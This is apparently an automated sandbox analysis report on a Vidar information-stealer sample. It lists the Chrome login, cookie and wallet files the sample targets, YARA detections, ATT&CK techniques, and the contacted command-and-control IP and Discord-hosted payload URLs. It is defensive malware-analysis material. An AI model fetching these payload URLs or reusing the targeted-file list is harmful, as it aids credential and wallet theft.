Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: keystore
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSQNZmmg2F.exe PID: 1404, type: MEMORYSTR

Remote Access Functionality:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.33a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.33a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MSQNZmmg2F.exe.3480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MSQNZmmg2F.exe.3480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.247390446.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSQNZmmg2F.exe PID: 1404, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection11	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Credentials in Registry1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing22	NTDS	System Information Discovery45	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Security Software Discovery21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	Process Discovery12	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	NTFS File Attributes1	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MSQNZmmg2F.exe	37%	Virustotal		Browse
MSQNZmmg2F.exe	67%	ReversingLabs	Win32.Trojan.Racealer
MSQNZmmg2F.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.3.MSQNZmmg2F.exe.3480000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
0.2.MSQNZmmg2F.exe.33a0e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
mas.to	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://mas.to/users/oleg98/following	0%	Avira URL Cloud	safe
http://65.108.80.190/nss3.dll&	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://65.108.80.190/10089	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://65.108.80.190/softokn3.dlle	0%	Avira URL Cloud	safe
http://65.108.80.190/mozglue.dll	0%	Avira URL Cloud	safe
http://65.108.80.190/1008I	0%	Avira URL Cloud	safe
http://65.108.80.190/freebl3.dll	0%	Avira URL Cloud	safe
http://65.108.80.190/1008	0%	Avira URL Cloud	safe
https://mas.to/avatars/original/missing.png	0%	URL Reputation	safe
http://65.108.80.190/nss3.dll	0%	Avira URL Cloud	safe
http://65.108.80.190/softokn3.dll	0%	Avira URL Cloud	safe
http://65.108.80.190/freebl3.dlln/c	0%	Avira URL Cloud	safe
https://mas.to/	0%	URL Reputation	safe
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c	0%	URL Reputation	safe
http://65.108.80.190/	0%	Avira URL Cloud	safe
http://65.108.80.190/vcruntime140.dll	0%	Avira URL Cloud	safe
http://65.108.80.190/msvcp140.dllK	0%	Avira URL Cloud	safe
https://mas.to/users/oleg98/followers	0%	Avira URL Cloud	safe
http://65.108.80.190/msvcp140.dll	0%	Avira URL Cloud	safe
https://mas.to/@oleg98	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mas.to	88.99.75.82	true	true	7%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.130.233	true	false		high
www.google.com	142.250.203.100	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe	false		high
http://65.108.80.190/mozglue.dll	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/freebl3.dll	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/1008	false	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe	false		high
http://65.108.80.190/nss3.dll	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/softokn3.dll	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://www.google.com/	false		high
http://65.108.80.190/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://mas.to/@oleg98	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.0.dr	false		high
https://duckduckgo.com/ac/?q=	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;ilesu	MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	false		high
https://mas.to/users/oleg98/following	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;	MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe-M5	MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
http://65.108.80.190/nss3.dll&	MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	softokn3[1].dll.0.dr	false	URL Reputation: safe	unknown
http://65.108.80.190/10089	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	softokn3[1].dll.0.dr	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exekL	MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
http://65.108.80.190/softokn3.dlle	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	temp0.0.dr	false		high
http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exeilesf	MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	false		high
https://github.com/tootsuite/mastodon	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	false		high
https://joinmastodon.org/apps	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	false		high
http://65.108.80.190/1008I	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
https://mas.to/avatars/original/missing.png	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	softokn3[1].dll.0.dr	false		high
http://65.108.80.190/freebl3.dlln/c	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;M	MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	false		high
https://mas.to/	MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://65.108.80.190/msvcp140.dllK	MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mas.to/users/oleg98/followers	MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	temp0.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
88.99.75.82	mas.to	Germany	24940	HETZNER-ASDE	true
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
65.108.80.190	unknown	United States	11022	ALABANZA-BALTUS	false
142.250.203.100	www.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	504018
Start date:	16.10.2021
Start time:	16:52:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MSQNZmmg2F.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/23@3/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.200, 13.107.21.200, 95.100.218.79, 95.100.216.89, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:54:27	API Interceptor	1x Sleep call for process: VKOTTYY7FG6Q1H0K.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.99.75.82	gdpl2gPyv3.exe	Get hash	malicious	Browse
	dj3Rehx839.exe	Get hash	malicious	Browse
	mixshop_20211014-230224.exe	Get hash	malicious	Browse
	mUvDdSPT6Y.exe	Get hash	malicious	Browse
	b4VKxQN0um.exe	Get hash	malicious	Browse
	x8GpMU8C4I.exe	Get hash	malicious	Browse
	UyyDLuj9M5.exe	Get hash	malicious	Browse
	Hhfx4z3Jrt.exe	Get hash	malicious	Browse
	GR01DtRd0N.exe	Get hash	malicious	Browse
	0q3K4qJqQT.exe	Get hash	malicious	Browse
	FTdhc25gn8.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Ransom.Stop.Z5.27157.exe	Get hash	malicious	Browse
	zrArDsoum0.exe	Get hash	malicious	Browse
	UZWdHg3hWA.exe	Get hash	malicious	Browse
	LBJiq1QBaH.exe	Get hash	malicious	Browse
	HJmXSL9b6P.exe	Get hash	malicious	Browse
	frj4kNTbl3.exe	Get hash	malicious	Browse
	xzH2c9tI13.exe	Get hash	malicious	Browse
	xzH2c9tI13.exe	Get hash	malicious	Browse
	538ILRcwmF.exe	Get hash	malicious	Browse
162.159.130.233	b7cwlpwH6S.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	bot.exe	Get hash	malicious	Browse	162.159.129.233
	Purchasing Order.exe	Get hash	malicious	Browse	162.159.135.233
	gdpl2gPyv3.exe	Get hash	malicious	Browse	162.159.134.233
	joNL3ZilY0.exe	Get hash	malicious	Browse	162.159.133.233
	AeXXqhQNJKur7teIlOrvF329.exe	Get hash	malicious	Browse	162.159.134.233
	Sapphire.exe	Get hash	malicious	Browse	162.159.129.233
	Setup.exe	Get hash	malicious	Browse	162.159.129.233
	RFQ Material Standard BS 4360 GR. 40A43A.exe	Get hash	malicious	Browse	162.159.133.233
	YARN FAIR CONTRACT.pdf.exe	Get hash	malicious	Browse	162.159.134.233
	p2.exe	Get hash	malicious	Browse	162.159.135.233
	m9azdNJhg2.exe	Get hash	malicious	Browse	162.159.133.233
	Waybill.exe	Get hash	malicious	Browse	162.159.129.233
	FS5ObHHag7.exe	Get hash	malicious	Browse	162.159.133.233
	SmZhvsyNc0.exe	Get hash	malicious	Browse	162.159.135.233
	101421KSM.xlsx	Get hash	malicious	Browse	162.159.134.233
	DHL INVOICE DETAILS_pdf.exe	Get hash	malicious	Browse	162.159.130.233
	Swift Bildirimi.exe	Get hash	malicious	Browse	162.159.129.233
	Proforma fatura.pdf.exe.exe	Get hash	malicious	Browse	162.159.134.233
	DxyqmMxfK5.exe	Get hash	malicious	Browse	162.159.129.233
	RustHack.exe	Get hash	malicious	Browse	162.159.134.233
mas.to	gdpl2gPyv3.exe	Get hash	malicious	Browse	88.99.75.82
	dj3Rehx839.exe	Get hash	malicious	Browse	88.99.75.82
	mixshop_20211014-230224.exe	Get hash	malicious	Browse	88.99.75.82
	mUvDdSPT6Y.exe	Get hash	malicious	Browse	88.99.75.82
	b4VKxQN0um.exe	Get hash	malicious	Browse	88.99.75.82
	x8GpMU8C4I.exe	Get hash	malicious	Browse	88.99.75.82
	UyyDLuj9M5.exe	Get hash	malicious	Browse	88.99.75.82
	Hhfx4z3Jrt.exe	Get hash	malicious	Browse	88.99.75.82
	GR01DtRd0N.exe	Get hash	malicious	Browse	88.99.75.82
	0q3K4qJqQT.exe	Get hash	malicious	Browse	88.99.75.82
	FTdhc25gn8.exe	Get hash	malicious	Browse	88.99.75.82
	SecuriteInfo.com.Ransom.Stop.Z5.27157.exe	Get hash	malicious	Browse	88.99.75.82
	zrArDsoum0.exe	Get hash	malicious	Browse	88.99.75.82
	UZWdHg3hWA.exe	Get hash	malicious	Browse	88.99.75.82
	LBJiq1QBaH.exe	Get hash	malicious	Browse	88.99.75.82
	HJmXSL9b6P.exe	Get hash	malicious	Browse	88.99.75.82
	frj4kNTbl3.exe	Get hash	malicious	Browse	88.99.75.82
	xzH2c9tI13.exe	Get hash	malicious	Browse	88.99.75.82
	xzH2c9tI13.exe	Get hash	malicious	Browse	88.99.75.82
	538ILRcwmF.exe	Get hash	malicious	Browse	88.99.75.82

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Grabber.exe	Get hash	malicious	Browse	162.159.135.232
	5gojCyqMKF	Get hash	malicious	Browse	172.69.0.0
	bot.exe	Get hash	malicious	Browse	162.159.129.233
	Purchasing Order.exe	Get hash	malicious	Browse	162.159.135.233
	gdpl2gPyv3.exe	Get hash	malicious	Browse	162.159.134.233
	joNL3ZilY0.exe	Get hash	malicious	Browse	162.159.133.233
	6PAw5izjRO.exe	Get hash	malicious	Browse	104.21.94.228
	SsTefFVZNh.exe	Get hash	malicious	Browse	172.67.144.208
	sQffJNl5eI.exe	Get hash	malicious	Browse	104.21.76.206
	PT.updd	Get hash	malicious	Browse	172.67.191.194
	ZEKk2t5fJt.exe	Get hash	malicious	Browse	172.67.204.112
	dBJ2dwRpl5.exe	Get hash	malicious	Browse	104.21.85.99
	WGEcMZQA.dll	Get hash	malicious	Browse	104.20.185.68
	Fr6yaDjoE5.exe	Get hash	malicious	Browse	104.21.85.99
	9ubsb7p6h1.exe	Get hash	malicious	Browse	172.67.204.112
	Synapse-X-Cracked_460637337.exe	Get hash	malicious	Browse	172.67.177.45
	AeXXqhQNJKur7teIlOrvF329.exe	Get hash	malicious	Browse	104.21.33.184
	1u1hBVyy1i	Get hash	malicious	Browse	172.67.247.211
	IOI6w12lUDfF4tNCGf_7pzse.exe	Get hash	malicious	Browse	104.21.94.228
	UTJTSQdX9ITDLyCRBKvHrxJ7.exe	Get hash	malicious	Browse	104.21.33.184
HETZNER-ASDE	NBA 2K22 Cheat by Spyro.exe	Get hash	malicious	Browse	135.181.170.169
	gdpl2gPyv3.exe	Get hash	malicious	Browse	88.99.75.82
	6PAw5izjRO.exe	Get hash	malicious	Browse	88.99.66.31
	SsTefFVZNh.exe	Get hash	malicious	Browse	88.99.66.31
	sQffJNl5eI.exe	Get hash	malicious	Browse	88.99.66.31
	3ES3H87l9q.exe	Get hash	malicious	Browse	88.99.66.31
	AeXXqhQNJKur7teIlOrvF329.exe	Get hash	malicious	Browse	88.99.66.31
	IOI6w12lUDfF4tNCGf_7pzse.exe	Get hash	malicious	Browse	88.99.66.31
	UTJTSQdX9ITDLyCRBKvHrxJ7.exe	Get hash	malicious	Browse	88.99.66.31
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	88.99.66.31
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	88.99.66.31
	5he1PBER3h.exe	Get hash	malicious	Browse	88.99.66.31
	xMnk13mIl4.exe	Get hash	malicious	Browse	88.99.66.31
	6ZtFD1dbIy	Get hash	malicious	Browse	188.34.238.128
	ii.arm7	Get hash	malicious	Browse	188.40.114.113
	EC9Pb1FzKs	Get hash	malicious	Browse	5.9.88.46
	Doc_008543678.exe	Get hash	malicious	Browse	144.76.97.27
	New Order.exe	Get hash	malicious	Browse	116.202.174.203
	Xf5PjI7Ce2.exe	Get hash	malicious	Browse	88.99.66.31
	qJwdtvSek3.exe	Get hash	malicious	Browse	88.99.66.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	bot.exe	Get hash	malicious	Browse	142.250.203.100
	13MH7svRRs.exe	Get hash	malicious	Browse	142.250.203.100
	joNL3ZilY0.exe	Get hash	malicious	Browse	142.250.203.100
	6PAw5izjRO.exe	Get hash	malicious	Browse	142.250.203.100
	SsTefFVZNh.exe	Get hash	malicious	Browse	142.250.203.100
	sQffJNl5eI.exe	Get hash	malicious	Browse	142.250.203.100
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	142.250.203.100
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	142.250.203.100
	Setup.exe	Get hash	malicious	Browse	142.250.203.100
	Halkbank_Ekstre_2021151083739977776234_4397392776763884.exe	Get hash	malicious	Browse	142.250.203.100
	naaet6TlEK.exe	Get hash	malicious	Browse	142.250.203.100
	YARN FAIR CONTRACT.pdf.exe	Get hash	malicious	Browse	142.250.203.100
	New_Requests_5011555089.exe	Get hash	malicious	Browse	142.250.203.100
	New_Requests_30175082.exe	Get hash	malicious	Browse	142.250.203.100
	VERSANDDOKUMENTE_75876245.EXE	Get hash	malicious	Browse	142.250.203.100
	DHL INVOICE DETAILS_pdf.exe	Get hash	malicious	Browse	142.250.203.100
	DO854.exe	Get hash	malicious	Browse	142.250.203.100
	Swift Bildirimi.exe	Get hash	malicious	Browse	142.250.203.100
	Proforma fatura.pdf.exe.exe	Get hash	malicious	Browse	142.250.203.100
	ER1q1B9xUo.exe	Get hash	malicious	Browse	142.250.203.100
